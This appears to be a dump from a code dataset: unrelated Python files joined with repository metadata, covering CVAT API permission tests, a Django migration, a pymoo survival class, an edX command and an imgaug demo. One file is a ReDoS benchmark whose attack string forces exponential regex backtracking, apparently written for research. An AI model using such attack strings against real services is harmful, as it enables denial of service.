def _test_get_job_annotations_200(self, user, jid, data, **kwargs):
response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json(),
exclude_paths="root['version']") == {}
def _test_get_job_annotations_403(self, user, jid, **kwargs):
response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [''])
@pytest.mark.parametrize('groups, job_staff, is_allow', [
(['admin'], True, True), (['admin'], False, True),
(['business'], True, True), (['business'], False, False),
(['worker'], True, True), (['worker'], False, False),
(['user'], True, True), (['user'], False, False)
])
def test_user_get_job_annotations(self, org, groups, job_staff,
is_allow, users, jobs, tasks, annotations, find_job_staff_user):
users = [u for u in users if u['groups'] == groups]
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, job_id = find_job_staff_user(jobs, users, job_staff)
if is_allow:
self._test_get_job_annotations_200(username,
job_id, annotations['job'][str(job_id)], **kwargs)
else:
self._test_get_job_annotations_403(username, job_id, **kwargs)
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, job_staff, is_allow', [
('owner', True, True), ('owner', False, True),
('maintainer', True, True), ('maintainer', False, True),
('supervisor', True, True), ('supervisor', False, False),
('worker', True, True), ('worker', False, False),
])
def test_member_get_job_annotations(self, org, role, job_staff, is_allow,
jobs, tasks, find_job_staff_user, annotations, find_users):
users = find_users(org=org, role=role)
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, jid = find_job_staff_user(jobs, users, job_staff)
if is_allow:
self._test_get_job_annotations_200(username,
jid, annotations['job'][str(jid)], **kwargs)
else:
self._test_get_job_annotations_403(username, jid, **kwargs)
@pytest.mark.parametrize('org', [1])
@pytest.mark.parametrize('privilege, is_allow', [
('admin', True), ('business', False), ('worker', False), ('user', False)
])
def test_non_member_get_job_annotations(self, org, privilege, is_allow,
jobs, tasks, find_job_staff_user, annotations, find_users):
users = find_users(privilege=privilege, exclude_org=org)
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, job_id = find_job_staff_user(jobs, users, False)
kwargs = {'org_id': org}
if is_allow:
self._test_get_job_annotations_200(username,
job_id, annotations['job'][str(job_id)], **kwargs)
else:
self._test_get_job_annotations_403(username, job_id, **kwargs)
class TestPatchJobAnnotations:
_ORG = 2
def _test_check_respone(self, is_allow, response, data=None):
if is_allow:
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json(),
exclude_paths="root['version']") == {}
else:
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.fixture(scope='class')
def request_data(self, annotations):
def get_data(jid):
data = annotations['job'][str(jid)].copy()
data['shapes'][0].update({'points': [2.0, 3.0, 4.0, 5.0, 6.0, 7.0]})
data['version'] += 1
return data
return get_data
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, job_staff, is_allow', [
('maintainer', False, True), ('owner', False, True),
('supervisor', False, False), ('worker', False, False),
('maintainer', True, True), ('owner', True, True),
('supervisor', True, True), ('worker', True, True)
])
def test_member_update_job_annotations(self, org, role, job_staff, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(role=role, org=org)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, job_staff)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations',
data, org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('privilege, is_allow', [
('admin', True), ('business', False), ('worker', False), ('user', False)
])
def test_non_member_update_job_annotations(self, org, privilege, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(privilege=privilege, exclude_org=org)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, False)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations', data,
org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
@pytest.mark.parametrize('org', [''])
@pytest.mark.parametrize('privilege, job_staff, is_allow', [
('admin', True, True), ('admin', False, True),
('business', True, True), ('business', False, False),
('worker', True, True), ('worker', False, False),
('user', True, True), ('user', False, False)
])
def test_user_update_job_annotations(self, org, privilege, job_staff, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(privilege=privilege)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, job_staff)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations', data,
org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
class TestPatchJob:
_ORG = 2
@pytest.fixture(scope='class')
def find_task_staff_user(self, is_task_staff):
def find(jobs, users, is_staff):
for job in jobs:
for user in users:
if is_staff == is_task_staff(user['id'], job['task_id']):
return user, job['id']
return None, None
return find
@pytest.fixture(scope='class')
def expected_data(self, jobs, users):
keys = ['url', 'id', 'username', 'first_name', 'last_name']
def find(job_id, assignee_id):
data = jobs[job_id].copy()
data['assignee'] = dict(filter(lambda a: a[0] in keys,
users[assignee_id].items()))
return data
return find
@pytest.fixture(scope='class')
def new_assignee(self, jobs, tasks, assignee_id, org_staff):
def find_new_assignee(jid, user_id):
members = org_staff(tasks[jobs[jid]['task_id']]['organization'])
members -= {assignee_id(jobs[jid]), user_id}
return members.pop()
return find_new_assignee
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, task_staff, is_allow', [
('maintainer', False, True), ('owner', False, True),
('supervisor', False, False), ('worker', False, False),
('maintainer', True, True), ('owner', True, True),
('supervisor', True, True), ('worker', True, True)
])
def test_member_update_job_assignee(self, org, role, task_staff, is_allow,
find_task_staff_user, find_users, jobs_by_org, new_assignee, expected_data):
users, jobs = find_users(role=role, org=org), jobs_by_org[org]
user, jid = find_task_staff_user(jobs, users, task_staff)
assignee = new_assignee(jid, user['id'])
response = patch_method(user['username'], f'jobs/{jid}',
{'assignee': assignee}, org_id=self._ORG)
if is_allow:
assert response.status_code == HTTPStatus.OK
assert DeepDiff(expected_data(jid, assignee), response.json()) == {}
else:
assert response.status_code == HTTPStatus.FORBIDDEN
| 41.883871 | 97 | 0.614911 |
from http import HTTPStatus
from deepdiff import DeepDiff
import pytest
from .utils.config import get_method, patch_method
def get_job_staff(job, tasks, projects):
job_staff = []
job_staff.append(job['assignee'])
tid = job['task_id']
job_staff.append(tasks[tid]['owner'])
job_staff.append(tasks[tid]['assignee'])
pid = job['project_id']
if pid:
job_staff.append(projects[pid]['owner'])
job_staff.append(projects[pid]['assignee'])
job_staff = set(u['id'] for u in job_staff if u is not None)
return job_staff
def filter_jobs(jobs, tasks, org):
if org is None:
kwargs = {}
jobs = jobs.raw
elif org == '':
kwargs = {'org': ''}
jobs = [job for job in jobs
if tasks[job['task_id']]['organization'] is None]
else:
kwargs = {'org_id': org}
jobs = [job for job in jobs
if tasks[job['task_id']]['organization'] == org]
return jobs, kwargs
class TestGetJobs:
def _test_get_job_200(self, user, jid, data, **kwargs):
response = get_method(user, f'jobs/{jid}', **kwargs)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json()) == {}
def _test_get_job_403(self, user, jid, **kwargs):
response = get_method(user, f'jobs/{jid}', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [None, '', 1, 2])
def test_admin_get_job(self, jobs, tasks, org):
jobs, kwargs = filter_jobs(jobs, tasks, org)
for job in jobs[:8]:
self._test_get_job_200('admin2', job['id'], job, **kwargs)
@pytest.mark.parametrize('org_id', ['', None, 1, 2])
@pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
def test_non_admin_get_job(self, org_id, groups, users, jobs, tasks, projects,
org_staff):
users = [u for u in users if u['groups'] == groups][:4]
jobs, kwargs = filter_jobs(jobs, tasks, org_id)
org_staff = org_staff(org_id)
for job in jobs[:8]:
job_staff = get_job_staff(job, tasks, projects)
for user in users:
if user['id'] in job_staff | org_staff:
self._test_get_job_200(user['username'], job['id'], job, **kwargs)
else:
self._test_get_job_403(user['username'], job['id'], **kwargs)
class TestListJobs:
def _test_list_jobs_200(self, user, data, **kwargs):
response = get_method(user, 'jobs', **kwargs, page_size=all)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json()['results']) == {}
def _test_list_jobs_403(self, user, **kwargs):
response = get_method(user, 'jobs', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [None, '', 1, 2])
def test_admin_list_jobs(self, jobs, tasks, org):
jobs, kwargs = filter_jobs(jobs, tasks, org)
self._test_list_jobs_200('admin1', jobs, **kwargs)
@pytest.mark.parametrize('org_id', ['', None, 1, 2])
@pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
def test_non_admin_list_jobs(self, org_id, groups, users, jobs, tasks,
projects, org_staff, is_org_member):
users = [u for u in users if u['groups'] == groups][:2]
jobs, kwargs = filter_jobs(jobs, tasks, org_id)
org_staff = org_staff(org_id)
for user in users:
user_jobs = []
for job in jobs:
job_staff = get_job_staff(job, tasks, projects)
if user['id'] in job_staff | org_staff:
user_jobs.append(job)
if is_org_member(user['id'], org_id):
self._test_list_jobs_200(user['username'], user_jobs, **kwargs)
else:
self._test_list_jobs_403(user['username'], **kwargs)
class TestGetAnnotations:
def _test_get_job_annotations_200(self, user, jid, data, **kwargs):
response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json(),
exclude_paths="root['version']") == {}
def _test_get_job_annotations_403(self, user, jid, **kwargs):
response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [''])
@pytest.mark.parametrize('groups, job_staff, is_allow', [
(['admin'], True, True), (['admin'], False, True),
(['business'], True, True), (['business'], False, False),
(['worker'], True, True), (['worker'], False, False),
(['user'], True, True), (['user'], False, False)
])
def test_user_get_job_annotations(self, org, groups, job_staff,
is_allow, users, jobs, tasks, annotations, find_job_staff_user):
users = [u for u in users if u['groups'] == groups]
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, job_id = find_job_staff_user(jobs, users, job_staff)
if is_allow:
self._test_get_job_annotations_200(username,
job_id, annotations['job'][str(job_id)], **kwargs)
else:
self._test_get_job_annotations_403(username, job_id, **kwargs)
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, job_staff, is_allow', [
('owner', True, True), ('owner', False, True),
('maintainer', True, True), ('maintainer', False, True),
('supervisor', True, True), ('supervisor', False, False),
('worker', True, True), ('worker', False, False),
])
def test_member_get_job_annotations(self, org, role, job_staff, is_allow,
jobs, tasks, find_job_staff_user, annotations, find_users):
users = find_users(org=org, role=role)
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, jid = find_job_staff_user(jobs, users, job_staff)
if is_allow:
self._test_get_job_annotations_200(username,
jid, annotations['job'][str(jid)], **kwargs)
else:
self._test_get_job_annotations_403(username, jid, **kwargs)
@pytest.mark.parametrize('org', [1])
@pytest.mark.parametrize('privilege, is_allow', [
('admin', True), ('business', False), ('worker', False), ('user', False)
])
def test_non_member_get_job_annotations(self, org, privilege, is_allow,
jobs, tasks, find_job_staff_user, annotations, find_users):
users = find_users(privilege=privilege, exclude_org=org)
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, job_id = find_job_staff_user(jobs, users, False)
kwargs = {'org_id': org}
if is_allow:
self._test_get_job_annotations_200(username,
job_id, annotations['job'][str(job_id)], **kwargs)
else:
self._test_get_job_annotations_403(username, job_id, **kwargs)
class TestPatchJobAnnotations:
_ORG = 2
def _test_check_respone(self, is_allow, response, data=None):
if is_allow:
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json(),
exclude_paths="root['version']") == {}
else:
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.fixture(scope='class')
def request_data(self, annotations):
def get_data(jid):
data = annotations['job'][str(jid)].copy()
data['shapes'][0].update({'points': [2.0, 3.0, 4.0, 5.0, 6.0, 7.0]})
data['version'] += 1
return data
return get_data
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, job_staff, is_allow', [
('maintainer', False, True), ('owner', False, True),
('supervisor', False, False), ('worker', False, False),
('maintainer', True, True), ('owner', True, True),
('supervisor', True, True), ('worker', True, True)
])
def test_member_update_job_annotations(self, org, role, job_staff, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(role=role, org=org)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, job_staff)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations',
data, org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('privilege, is_allow', [
('admin', True), ('business', False), ('worker', False), ('user', False)
])
def test_non_member_update_job_annotations(self, org, privilege, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(privilege=privilege, exclude_org=org)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, False)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations', data,
org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
@pytest.mark.parametrize('org', [''])
@pytest.mark.parametrize('privilege, job_staff, is_allow', [
('admin', True, True), ('admin', False, True),
('business', True, True), ('business', False, False),
('worker', True, True), ('worker', False, False),
('user', True, True), ('user', False, False)
])
def test_user_update_job_annotations(self, org, privilege, job_staff, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(privilege=privilege)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, job_staff)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations', data,
org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
class TestPatchJob:
_ORG = 2
@pytest.fixture(scope='class')
def find_task_staff_user(self, is_task_staff):
def find(jobs, users, is_staff):
for job in jobs:
for user in users:
if is_staff == is_task_staff(user['id'], job['task_id']):
return user, job['id']
return None, None
return find
@pytest.fixture(scope='class')
def expected_data(self, jobs, users):
keys = ['url', 'id', 'username', 'first_name', 'last_name']
def find(job_id, assignee_id):
data = jobs[job_id].copy()
data['assignee'] = dict(filter(lambda a: a[0] in keys,
users[assignee_id].items()))
return data
return find
@pytest.fixture(scope='class')
def new_assignee(self, jobs, tasks, assignee_id, org_staff):
def find_new_assignee(jid, user_id):
members = org_staff(tasks[jobs[jid]['task_id']]['organization'])
members -= {assignee_id(jobs[jid]), user_id}
return members.pop()
return find_new_assignee
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, task_staff, is_allow', [
('maintainer', False, True), ('owner', False, True),
('supervisor', False, False), ('worker', False, False),
('maintainer', True, True), ('owner', True, True),
('supervisor', True, True), ('worker', True, True)
])
def test_member_update_job_assignee(self, org, role, task_staff, is_allow,
find_task_staff_user, find_users, jobs_by_org, new_assignee, expected_data):
users, jobs = find_users(role=role, org=org), jobs_by_org[org]
user, jid = find_task_staff_user(jobs, users, task_staff)
assignee = new_assignee(jid, user['id'])
response = patch_method(user['username'], f'jobs/{jid}',
{'assignee': assignee}, org_id=self._ORG)
if is_allow:
assert response.status_code == HTTPStatus.OK
assert DeepDiff(expected_data(jid, assignee), response.json()) == {}
else:
assert response.status_code == HTTPStatus.FORBIDDEN
| true | true |
f71012b82436e5dd37274c5125768f25f6343cca | 371 | py | Python | polls/migrations/0002_auto_20200211_1555.py | rpesce/django_tutorial | b0a3c10c1246ec42e9c86c03a7b441ff8be1c495 | [
"Apache-2.0"
] | 11 | 2020-03-25T16:03:08.000Z | 2022-03-19T17:59:43.000Z | polls/migrations/0002_auto_20200211_1555.py | rpesce/django_tutorial | b0a3c10c1246ec42e9c86c03a7b441ff8be1c495 | [
"Apache-2.0"
] | null | null | null | polls/migrations/0002_auto_20200211_1555.py | rpesce/django_tutorial | b0a3c10c1246ec42e9c86c03a7b441ff8be1c495 | [
"Apache-2.0"
] | 3 | 2020-08-18T03:34:59.000Z | 2022-03-21T13:44:45.000Z | # Generated by Django 3.0.3 on 2020-02-11 20:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='choice',
name='votes',
field=models.IntegerField(default=0),
),
]
| 19.526316 | 49 | 0.58221 |
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='choice',
name='votes',
field=models.IntegerField(default=0),
),
]
| true | true |
f71013d279ee02e1a4eef74c167f62131c79ae29 | 1,991 | py | Python | evosoro_pymoo/Algorithms/RankAndNoveltySurvival.py | leguiart/MSc_Thesis | 22ffc73c75d814856850f26c4586d90896b74cf3 | [
"MIT"
] | null | null | null | evosoro_pymoo/Algorithms/RankAndNoveltySurvival.py | leguiart/MSc_Thesis | 22ffc73c75d814856850f26c4586d90896b74cf3 | [
"MIT"
] | null | null | null | evosoro_pymoo/Algorithms/RankAndNoveltySurvival.py | leguiart/MSc_Thesis | 22ffc73c75d814856850f26c4586d90896b74cf3 | [
"MIT"
] | null | null | null | import numpy as np
from pymoo.core.survival import Survival
from pymoo.util.nds.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
# ---------------------------------------------------------------------------------------------------------
# Survival Selection
# ---------------------------------------------------------------------------------------------------------
class RankAndNoveltySurvival(Survival):
def __init__(self, nds=None) -> None:
super().__init__(filter_infeasible=True)
self.nds = nds if nds is not None else NonDominatedSorting()
def _do(self, problem, pop, *args, n_survive=None, **kwargs):
# get the objective space values and objects
F = pop.get("F").astype(float, copy=False)
# the final indices of surviving individuals
survivors = []
# do the non-dominated sorting until splitting front
fronts = self.nds.do(F, n_stop_if_ranked=n_survive)
for k, front in enumerate(fronts):
# calculate the novelty of the front
novelty_of_front = get_unaligned_novelty(pop[front])
# save rank and crowding in the individual class
for j, i in enumerate(front):
pop[i].set("rank", k)
pop[i].set("crowding", novelty_of_front[j])
# current front sorted by crowding distance if splitting
if len(survivors) + len(front) > n_survive:
I = randomized_argsort(novelty_of_front, order='descending', method='numpy')
I = I[:(n_survive - len(survivors))]
# otherwise take the whole front unsorted
else:
I = np.arange(len(front))
# extend the survivors by all or selected individuals
survivors.extend(front[I])
return pop[survivors]
def get_unaligned_novelty(pop):
return np.array([x_i.X.unaligned_novelty_metric for x_i in pop])
| 35.553571 | 107 | 0.57559 | import numpy as np
from pymoo.core.survival import Survival
from pymoo.util.nds.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
class RankAndNoveltySurvival(Survival):
def __init__(self, nds=None) -> None:
super().__init__(filter_infeasible=True)
self.nds = nds if nds is not None else NonDominatedSorting()
def _do(self, problem, pop, *args, n_survive=None, **kwargs):
F = pop.get("F").astype(float, copy=False)
survivors = []
fronts = self.nds.do(F, n_stop_if_ranked=n_survive)
for k, front in enumerate(fronts):
novelty_of_front = get_unaligned_novelty(pop[front])
for j, i in enumerate(front):
pop[i].set("rank", k)
pop[i].set("crowding", novelty_of_front[j])
if len(survivors) + len(front) > n_survive:
I = randomized_argsort(novelty_of_front, order='descending', method='numpy')
I = I[:(n_survive - len(survivors))]
else:
I = np.arange(len(front))
survivors.extend(front[I])
return pop[survivors]
def get_unaligned_novelty(pop):
return np.array([x_i.X.unaligned_novelty_metric for x_i in pop])
| true | true |
f7101568fd06e7609738fb50b7989e279bd9adf1 | 321 | py | Python | tests/resources/functional/test_all.py | IamSaurabh1/taurus | 928d44e30e6cd5b979e675bfdce4c1dbeb5d0eff | [
"Apache-2.0"
] | 1,743 | 2015-03-30T20:56:03.000Z | 2022-03-31T09:08:37.000Z | tests/resources/functional/test_all.py | IamSaurabh1/taurus | 928d44e30e6cd5b979e675bfdce4c1dbeb5d0eff | [
"Apache-2.0"
] | 1,159 | 2015-04-01T08:25:53.000Z | 2022-03-29T08:15:31.000Z | tests/resources/functional/test_all.py | IamSaurabh1/taurus | 928d44e30e6cd5b979e675bfdce4c1dbeb5d0eff | [
"Apache-2.0"
] | 497 | 2015-03-31T21:05:18.000Z | 2022-03-17T12:45:21.000Z | from unittest import TestCase, skipIf
class TestAll(TestCase):
def test_passing(self):
pass
def test_erroring(self):
raise Exception("Ima broke")
def test_failing(self):
self.assertEquals(2 + 2 * 2, 8)
@skipIf(2 > 1, "Skip everytime")
def test_skipped(self):
pass
| 18.882353 | 39 | 0.623053 | from unittest import TestCase, skipIf
class TestAll(TestCase):
def test_passing(self):
pass
def test_erroring(self):
raise Exception("Ima broke")
def test_failing(self):
self.assertEquals(2 + 2 * 2, 8)
@skipIf(2 > 1, "Skip everytime")
def test_skipped(self):
pass
| true | true |
f71015ada55db9be78eab80611c4bfe815bfe940 | 512 | py | Python | regexlib/2021-5-15/python_re_test_file/regexlib_6851.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | 1 | 2022-01-24T14:43:23.000Z | 2022-01-24T14:43:23.000Z | regexlib/2021-5-15/python_re_test_file/regexlib_6851.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | regexlib/2021-5-15/python_re_test_file/regexlib_6851.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | # 6851
# ^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$
# EXPONENT
# nums:4
# EXPONENT AttackString:"a"+"0"*32+"!1 __NQ"
import re
from time import perf_counter
regex = """^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "a" + "0" * i * 1 + "!1 __NQ"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!") | 26.947368 | 60 | 0.568359 |
import re
from time import perf_counter
regex = """^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "a" + "0" * i * 1 + "!1 __NQ"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!") | true | true |
f71016e8f4f652bd02e3c9822c374573d6ee503c | 844 | py | Python | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/discussion/management/commands/create_roles_for_existing.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 3 | 2021-12-15T04:58:18.000Z | 2022-02-06T12:15:37.000Z | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/discussion/management/commands/create_roles_for_existing.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | null | null | null | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/discussion/management/commands/create_roles_for_existing.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 1 | 2019-01-02T14:38:50.000Z | 2019-01-02T14:38:50.000Z | """
This must be run only after seed_permissions_roles.py!
Creates default roles for all users currently in the database. Just runs through
Enrollments.
"""
from django.core.management.base import BaseCommand
from common.djangoapps.student.models import CourseEnrollment
from openedx.core.djangoapps.django_comment_common.models import assign_default_role_on_enrollment
class Command(BaseCommand): # lint-amnesty, pylint: disable=missing-class-docstring
help = 'Seed default permisssions and roles.'
def handle(self, *args, **options):
print('Updated roles for ', end=' ')
for i, enrollment in enumerate(CourseEnrollment.objects.filter(is_active=1), start=1):
assign_default_role_on_enrollment(None, enrollment)
if i % 1000 == 0:
print(f'{i}...', end=' ')
print()
| 33.76 | 98 | 0.716825 |
from django.core.management.base import BaseCommand
from common.djangoapps.student.models import CourseEnrollment
from openedx.core.djangoapps.django_comment_common.models import assign_default_role_on_enrollment
class Command(BaseCommand):
help = 'Seed default permisssions and roles.'
def handle(self, *args, **options):
print('Updated roles for ', end=' ')
for i, enrollment in enumerate(CourseEnrollment.objects.filter(is_active=1), start=1):
assign_default_role_on_enrollment(None, enrollment)
if i % 1000 == 0:
print(f'{i}...', end=' ')
print()
| true | true |
f71017b7f644057a8140806f89c03842a4395186 | 1,962 | py | Python | notebooks/imgaug-playground.py | robertklee/SENG474-DataMining | 1996e263fb9a84d62ceab2b2402cbbcaf7a1e2d7 | [
"MIT"
] | 14 | 2021-03-09T06:38:39.000Z | 2022-03-11T16:21:46.000Z | notebooks/imgaug-playground.py | axjing/PoseEstimate | 85b6ff300e18320fe8b40c89d5f22fde51ba588e | [
"MIT"
] | 23 | 2021-03-07T20:50:50.000Z | 2022-01-17T04:01:08.000Z | notebooks/imgaug-playground.py | axjing/PoseEstimate | 85b6ff300e18320fe8b40c89d5f22fde51ba588e | [
"MIT"
] | 9 | 2021-04-13T16:21:44.000Z | 2022-02-23T06:08:30.000Z | import imgaug as ia
from imgaug import augmenters as iaa
import numpy as np
from scipy import misc
import imageio
import cv2
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables import Keypoint, KeypointsOnImage
ia.seed(1)
image = ia.quokka(size=(256, 256))
kps = KeypointsOnImage([
Keypoint(x=65, y=100),
Keypoint(x=75, y=200),
Keypoint(x=100, y=100),
Keypoint(x=200, y=80)
], shape=image.shape)
seq = iaa.Sequential([
iaa.Multiply((1.2, 1.5)), # change brightness, doesn't affect keypoints
iaa.Affine(
rotate=10,
scale=(0.5, 0.7)
) # rotate by exactly 10deg and scale to 50-70%, affects keypoints
])
# Augment keypoints and images.
image_aug, kps_aug = seq(image=image, keypoints=kps)
# print coordinates before/after augmentation (see below)
# use after.x_int and after.y_int to get rounded integer coordinates
for i in range(len(kps.keypoints)):
before = kps.keypoints[i]
after = kps_aug.keypoints[i]
print("Keypoint %d: (%.8f, %.8f) -> (%.8f, %.8f)" % (
i, before.x, before.y, after.x, after.y)
)
# image with keypoints before/after augmentation (shown below)
image_before = kps.draw_on_image(image, size=7)
image_after = kps_aug.draw_on_image(image_aug, size=7)
def main():
imgs = np.zeros((1, 100, 100, 3), dtype=np.uint8) + 255
bbs = ia.BoundingBoxesOnImage([
ia.BoundingBox(x1=0, x2=50, y1=0, y2=50)
], shape=imgs.shape[1:])
aug = iaa.Sequential([
iaa.Crop(px=10),
iaa.Pad(px=10, pad_cval=128),
iaa.Affine(scale=0.5, cval=0)
])
aug_det = aug.to_deterministic()
imgs_aug = aug_det.augment_images(imgs)
bbs_aug = aug_det.augment_bounding_boxes([bbs])
print("bbs:")
for bbs_aug_i in bbs_aug[0].bounding_boxes:
print(bbs_aug_i)
cv2.imshow('orig',imgs)
cv2.imshow('aug',bbs_aug[0].draw_on_image(imgs_aug[0]))
cv2.waitKey()
if __name__ == "__main__":
main() | 27.25 | 75 | 0.667686 | import imgaug as ia
from imgaug import augmenters as iaa
import numpy as np
from scipy import misc
import imageio
import cv2
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables import Keypoint, KeypointsOnImage
ia.seed(1)
image = ia.quokka(size=(256, 256))
kps = KeypointsOnImage([
Keypoint(x=65, y=100),
Keypoint(x=75, y=200),
Keypoint(x=100, y=100),
Keypoint(x=200, y=80)
], shape=image.shape)
seq = iaa.Sequential([
iaa.Multiply((1.2, 1.5)),
iaa.Affine(
rotate=10,
scale=(0.5, 0.7)
) # rotate by exactly 10deg and scale to 50-70%, affects keypoints
])
# Augment keypoints and images.
image_aug, kps_aug = seq(image=image, keypoints=kps)
# print coordinates before/after augmentation (see below)
# use after.x_int and after.y_int to get rounded integer coordinates
for i in range(len(kps.keypoints)):
before = kps.keypoints[i]
after = kps_aug.keypoints[i]
print("Keypoint %d: (%.8f, %.8f) -> (%.8f, %.8f)" % (
i, before.x, before.y, after.x, after.y)
)
# image with keypoints before/after augmentation (shown below)
image_before = kps.draw_on_image(image, size=7)
image_after = kps_aug.draw_on_image(image_aug, size=7)
def main():
imgs = np.zeros((1, 100, 100, 3), dtype=np.uint8) + 255
bbs = ia.BoundingBoxesOnImage([
ia.BoundingBox(x1=0, x2=50, y1=0, y2=50)
], shape=imgs.shape[1:])
aug = iaa.Sequential([
iaa.Crop(px=10),
iaa.Pad(px=10, pad_cval=128),
iaa.Affine(scale=0.5, cval=0)
])
aug_det = aug.to_deterministic()
imgs_aug = aug_det.augment_images(imgs)
bbs_aug = aug_det.augment_bounding_boxes([bbs])
print("bbs:")
for bbs_aug_i in bbs_aug[0].bounding_boxes:
print(bbs_aug_i)
cv2.imshow('orig',imgs)
cv2.imshow('aug',bbs_aug[0].draw_on_image(imgs_aug[0]))
cv2.waitKey()
if __name__ == "__main__":
main() | true | true |
f71018380534b07b785f0c1841cc61cff5c72b7b | 2,407 | py | Python | rllib/env/wrappers/tests/test_moab_wrapper.py | BonsaiAI/ray | 941d30f082fe879ea30618af14327c25b5a21a74 | [
"Apache-2.0"
